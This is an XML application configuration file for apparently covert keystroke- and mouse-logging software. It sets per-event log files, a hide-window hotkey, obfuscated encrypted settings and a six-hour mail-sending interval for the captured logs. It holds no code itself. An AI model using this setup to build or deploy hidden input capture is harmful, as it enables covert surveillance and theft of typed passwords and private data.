<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, log4net" />
  </configSections>
  <startup>
    <supportedRuntime version="v2.0.50727"/>
  </startup>
  <appSettings>
    <add key="logsRootPath" value="+0yE+hnwDhIB2ib8NVG2rQ=="/>
    <add key="logFileName" value="K2vkjULSW5xcRd/0EGvPaA=="/>
    <add key="formatLogFileName" value="iNoj8dEEffL3uR2+SGH2iQ=="/>
    <add key="extLogFile" value="LglRcdbkfTM="/>

    <add key="logFileName_KeyPress" value="aYUAWgAMWomhx0YGYLddWA=="/>
    <add key="logFileName_KeyDown" value="/XWd/kc12Oc="/>
    <add key="logFileName_KeyUp" value="GdjkT4U8N+s="/>
    <add key="logFileName_MouseMove" value="Ha2+fX0AHbRUvEJykatnJg=="/>
    <add key="logFileName_MouseClick" value="fSy8TqEDXv7tBrKruwRq6w=="/>
    <add key="logFileName_MouseDown" value="CbCRr1F5tC+QFBMbyjCTOw=="/>
    <add key="logFileName_MouseUp" value="Pj3NITBtyZA="/>
    <add key="logFileName_MouseDoubleClick" value="PTPsUUeXQ1N200E5KDIPHDlLojcp4bDP"/>
    <add key="logFileName_MouseWheel" value="Cm/Id4DAvmgN8piscZ5NqA=="/>

    <add key="Alt" value="1"/>
    <add key="Ctrl" value="2"/>
    <add key="Shift" value="4"/>
    <add key="Win" value="8"/>
    <add key="HideShowWindowCombinationAdd" value="6"/>
    <add key="KeyCombination" value="F12"/>

    <add key="U3YnqluCrNs=" value="0d+9jaZZp2j+kNl3xAS0hnoAmkfceNptJlwxS4iFdLo=" />
    <add key="h8NE5MRgAdI=" value="Z4yPqT8D/+S41pa4H1hgWLwqqRCqFSu5o7SKU+SuPs0=" />
    <add key="H2hzgLwL1b8=" value="" />
    <add key="KfGTk8fownL1Hd+KrQhdIQ==" value="4sNVVbQ+ZgRG3vdvjLftYQ==" />
    <add key="8SnNYDZCG+g=" value="Q9Im5jA9WgE=" />
    <add key="UTqLhrQewRs=" value="mZq9CPo8XQo=" />
    <add key="7cNLYQmZJPTU74Je2Es2wFuj+k6F8wTJ" value="mZq9CPo8XQo=" />
    <add key="Mowf1gGn6Fg=" value="0d+9jaZZp2j+kNl3xAS0hnoAmkfceNptJlwxS4iFdLo=" />
    <add key="0wvJLF7jdSs=" value="yLa/yK70RuMiZvEMIEzxBQ==" />
    <add key="cTTtR0NvEsc=" value="" />
    <add key="66TmRyy65NY+zc/xVwAlDbhxWE46X2aCWWxuoVBTn8Q=" value="nwZ7IyTauQ0=" />
    <add key="k0xwunDhWuGXTEaCs79xsw==" value="mZq9CPo8XQo=" />
    <add key="MZRvg53uajO/PpAUOGyDzQ==" value="High" />
    
    <add key="incLogGeneral" value="true" />
    <add key="incLog4Net" value="false" />
    <add key="incChkKeyPressLog" value="true" />
    <add key="incChkKeyDownLog" value="false" />
    <add key="intervalSendMailMillis" value="21600000" />
    <add key="diasConservFlsEvts" value="30" />
    <add key="sendMailWithOutAtachments" value="nwZ7IyTauQ0=" />
  </appSettings>
</configuration>
